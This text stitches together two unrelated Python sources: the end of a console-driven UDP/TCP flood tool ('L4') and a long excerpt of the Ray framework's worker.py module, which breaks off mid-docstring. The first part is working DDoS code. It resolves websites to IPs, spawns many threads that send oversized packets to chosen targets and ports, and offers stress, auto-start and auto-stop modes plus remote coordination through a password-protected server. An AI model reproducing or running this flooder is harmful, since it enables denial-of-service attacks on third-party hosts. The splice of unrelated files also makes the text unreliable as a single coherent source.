data = requests.post((var.server[2] + ("get/com%s" % var.server[4])), data={"password": var.server[3]}).text
if data != "500":
var.server[4] = var.server[4] + 1
var.run_command = [data, data]
print(var.ps1 + "\r")
break
else:
sleep(1)
@event.event
def on_interrupt():
print("")
var.stop()
@event.event
def on_command(command):
if var.session[0][0]:
var.session[0][1].write(command + "\n")
if var.server[0] and var.server[1]:
status = requests.post((var.server[2] + "set/com"), data={"password": var.server[3], "data": command}).text
if status != "200":
print("")
print("An error occured, while sending commands to the server.")
print("")
@event.command
def debug():
var.l4_debug = True
print("")
print("Debugging mode enabled.")
print("")
def help(self):
event.help_title("\x1b[1;39mUDP/TCP Flood Help:\x1b[0;39m")
tools.help("| |-- ", " :: ", event)
print("")
@event.command
def port(command):
print("")
try:
var.port = [int(tools.arg("Port: ", "port ", command))]
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def threads(command):
print("")
try:
var.threads = int(tools.arg("Threads: ", "threads ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def ip(command):
print("")
var.ip = [tools.arg("Target: ", "ip ", command)]
if "." not in var.ip[0]:
print("This IP does not exist.")
print("")
@event.command
def web(command):
print(" ")
try:
webtoip = tools.arg("Website: ", "web ", command)
webtoip = webtoip.replace("http://", "")
webtoip = webtoip.replace("https://", "")
webtoiptxt = str(socket.gethostbyname(webtoip))
var.ip = [webtoiptxt]
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def method(command):
print("")
if var.socketmethod == "TCP":
var.socketmethod = "UDP"
print("Method changed to UDP.")
else:
var.socketmethod = "TCP"
print("Method changed to TCP.")
print("")
@event.command
def sleep(command):
print("")
try:
var.sleep = int(tools.arg("Delay in seconds: ", "sleep ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def outtxt(command):
print(" ")
if var.outtxt:
print("The output has been reduced.")
var.outtxt = False
else:
print("The output has been set to normal.")
var.outtxt = True
print(" ")
@event.command
def mute(command):
print(" ")
if var.outtxtmute:
print("The output has been disabled.")
var.outtxtmute = False
else:
print("The output has been enabled.")
var.outtxtmute = True
print(" ")
@event.command
def message(command):
print("")
var.message = tools.arg("Message: ", "message ", command)
var.rtxt = 1
print("")
@event.command
def get(command):
print("")
var.get_url = tools.arg("GET Header: ", "get ", command)
print("")
@event.command
def repeat(command):
print(" ")
try:
rtxtzw = var.rtxt
var.rtxt = int(tools.arg("Repeat message x times: ", "repeat ", command))
if var.rtxt < 1:
print("There was an error while executing.")
else:
if rtxtzw < var.rtxt:
var.messagezw = var.message
var.message = (str(var.message) * int(var.rtxt))
else:
var.message = (str(var.messagezw) * int(var.rtxt))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def mb(command):
print(" ")
try:
setmb = int(tools.arg("Size of Packet in MB: ", "mb ", command))
setmb = int(setmb / 0.000001)
var.message = ("r" * setmb)
var.rtxt = setmb
var.messagezw = "r"
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def stress(command):
print(" ")
if var.stress:
print("The stress mode has been disabled.")
var.stress = False
else:
print("The stress mode has been enabled.")
var.stress = True
print(" ")
@event.command
def st_wait(command):
print("")
try:
var.timeforstress = int(tools.arg("Delay in seconds: ", "st wait ", command))
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def ips(command):
print("")
var.ip = tools.arg("Targets (Seperated by ', '): ", "ips ", command).split(", ")
for ip in var.target:
if "." not in ip:
print("This IP does not exist.")
print("")
@event.command
def ports(command):
print("")
try:
var.port = tools.arg("Ports (Seperated by ', '): ", "ports ", command).split(", ")
for port in var.port:
if isinstance(port, int):
print("Entered ports cannot be used.")
except Exception as e:
print("There was an error while executing.", e)
print("")
@event.command
def webs(command):
print(" ")
try:
webtoip = tools.arg("Websites (Seperated by ', '): ", "webs ", command).split(", ")
for pos, web in enumerate(webtoip):
webtoip[pos] = web.replace("http://", "")
webtoip[pos] = webtoip[pos].replace("https://", "")
webtoip[pos] = str(socket.gethostbyname(webtoip[pos]))
var.ip = webtoip
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_step(command):
print(" ")
try:
var.autostep = int(tools.arg("Delay for next thread to activate (in Seconds): ", "auto step ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_start(command):
print(" ")
try:
var.autostart = int(tools.arg("Delay for attack to start (in Seconds): ", "auto start ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def auto_stop(command):
print(" ")
try:
var.autostop = int(tools.arg("Stop the attack after x seconds: ", "auto stop ", command))
except Exception as e:
print("There was an error while executing.", e)
print(" ")
@event.command
def agent(command):
print(" ")
var.user_agents = [tools.arg("Enter a user agent: ", "agent ", command)]
print(" ")
def show_values(self):
print("")
print("Ports: %s" % var.port)
print("Threads: %s" % var.threads)
print("Targets: %s" % var.ip)
print("Method: %s" % var.socketmethod)
print("Time between each packet: %s" % var.sleep)
print("Output: %s" % var.outtxt)
print("Muted: %s" % var.outtxtmute)
print("Packet message: %s" % var.message[:15])
print("Repeat packet text: %s" % var.rtxt)
print("Stress-Test mode: %s" % var.stress)
print("Stress-Test level duration: %s" % var.timeforstress)
print("Start Delay: %s" % var.autostart)
print("Stop after x seconds: %s" % var.autostop)
print("Time between threads: %s" % var.autostep)
if len(var.user_agents) == 1:
print("User Agent: %s" % var.user_agents[0])
if var.get_url != "":
print("GET Header: %s" % var.get_url)
print("")
def stresstest(self):
print(" ")
print("Time between: %s" % str(var.timeforstress))
print("Using %s threads per round" % str(var.threads))
print("To stop the attack press: CTRL + C")
print(" ")
sleep(2)
while True:
for thread in range(var.threads):
try:
t = Thread(target=self.ddos)
t.start()
except Exception:
print("\x1b[0;39mFailed to start a thread.")
sleep(var.timeforstress)
if var.stresserror:
print(" ")
print("Stopped at %s threads!" % (str(var.stresstestvar * var.threads)))
print(" ")
var.runactive = False
quit()
else:
var.stresstestvar += 1
def ddos(self):
mesalready = False
if var.get_url == "":
var.get_url = var.ip
packet = ("GET /%s HTTP/1.1\r\nHost: %s\r\n User-Agent: %s\r\nConnection: Keep-Alive\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n\r\n" % (var.get_url, var.ip, choice(var.user_agents), var.message)).encode("utf-8")
if not var.outtxtmute:
print("Thread started!")
if var.socketmethod == "UDP":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while var.runactive:
for ipvalue in var.ip:
for portvalue in var.port:
try:
if var.socketmethod == "TCP":
mysocket.connect((ipvalue, portvalue))
else:
try:
mysocket.bind((ipvalue, portvalue))
except Exception:
pass
if var.socketmethod == "TCP":
mysocket.send(packet)
try:
mysocket.sendto(packet, (ipvalue, portvalue))
except Exception:
mysocket.send(packet)
if var.outtxt:
if not mesalready:
mesalready = True
print("\nSuccess for %s with port %s!" % (ipvalue, portvalue))
# sleep(sleepy)
var.command_log.append("Sucessful execution.")
except socket.error as ex:
if not var.outtxtmute:
mesalready = False
print("\nTarget %s with port %s not accepting request!" % (ipvalue, portvalue))
var.command_log.append("ERROR: %s" % ex)
if var.l4_debug:
print("ERROR: %s" % ex)
if var.stress:
var.stresserror = True
if var.socketmethod == "TCP":
try:
mysocket.close()
except Exception:
pass
if int(var.autostop) != 0:
autoendtime = time()
autotimer = (int(autoendtime) - int(var.autostarttime))
if var.autostop <= autotimer:
print("\x1b[0;39mAuto Stop")
var.runactive = False
quit()
var.stoped_threads += 1
@event.command
def run(command):
print("")
if var.ip != "":
def execute():
print("")
print("To stop the attack press: ENTER or CRTL + C")
sleep(3)
sleep(var.autostart)
if var.stress:
if len(var.target) == 1 and len(var.port) == 1:
self.stresstest()
else:
print("Do not use multiple targets/ports in the Stress-Testing mode.")
else: # Normal Mode
if var.autostop != 0:
var.autostarttime = time()
for thread in range(var.threads):
try:
t = Thread(target=self.ddos)
sleep(var.autostep)
t.start()
except Exception:
print("Could not start thread %s." % thread)
def reset_attack():
print("Stopping threads...")
var.runactive = False
sleep(2)
while True:
if var.stoped_threads == var.threads:
break
else:
sleep(1)
if var.l4_debug:
print("Saving debugging log...")
output_to = path.join(getcwd(), "l4_debug_log.txt")
write_method = "a"
if path.isfile(output_to):
write_method = "a"
else:
write_method = "w"
output_file = open(output_to, write_method)
if write_method == "a":
output_file.write("------------- New Log -------------")
output_file.write(str(name + "\n"))
output_file.write(str(version + "\n"))
output_file.write(str("\n".join(var.command_log)))
output_file.close()
print("Done.")
quit()
def check_stopped_execution():
while True:
data = requests.post((var.server[2] + "get/agreed"), data={"password": var.server[3]}).text
if data != "True":
reset_attack()
break
else:
sleep(1)
try:
if var.server[0] and var.server[0]:
rec_t = Thread(target=check_stopped_execution)
rec_t.start()
input("\r")
except KeyboardInterrupt:
pass
if var.server[0] and var.server[1]:
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "False"}).text
if status != "200":
print("An error occured, while sending data to the server.")
reset_attack()
if var.server[0] and not var.server[1]:
while True:
data = requests.post((var.server[2] + "get/agreed"), data={"password": var.server[3]}).text
if data == "True":
execute()
break
else:
sleep(1)
elif not tools.question("\nDo you agree to the terms of use?"):
print("Agreement not accepted.")
quit()
else:
if var.server[0] and var.server[1]:
if tools.question("\nWould you like to use the host as part of the ddos?"):
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "True"}).text
if status != "200":
print("An error occured, while sending data to the server.")
execute()
else:
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "True"}).text
if status != "200":
print("An error occured, while sending data to the server.")
try:
print("[Press Enter to stop the attack.]")
except KeyboardInterrupt:
pass
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "False"}).text
if status != "200":
print("An error occured, while sending data to the server.")
else:
execute()
else:
print("No target has been defined.")
print("")
def setup(console):
console.ps1 = "L4> "
console.add(Main(console), event)
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env import working_dir as working_dir_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(
self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
        # called by `register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
if os.environ.get("RAY_ENABLE_AUTO_CONNECT", "") != "0":
ray.client().connect()
return
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
            timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: The boolean that indicates whether we want to
run this function on other drivers. One case is we may need to
share objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
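# Illustrative usage sketch (assumes a running Ray cluster with at least one
# GPU; the task below is hypothetical and not part of this module's API).
# Inside a task or actor, ray.get_gpu_ids() reports only the GPUs assigned to
# that worker rather than every GPU on the node.
def _example_gpu_ids_in_task():
    @ray.remote(num_gpus=1)
    def which_gpus():
        return ray.get_gpu_ids()
    ray.init()
    try:
        print(ray.get(which_gpus.remote()))  # e.g. [0]
    finally:
        ray.shutdown()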
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = logging.INFO,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_lru_evict: bool = False,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities of those resources available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): The namespace to use for this job.
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port (int): Port number through which Ray exposes
system metrics via a Prometheus endpoint. It is currently under
active development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
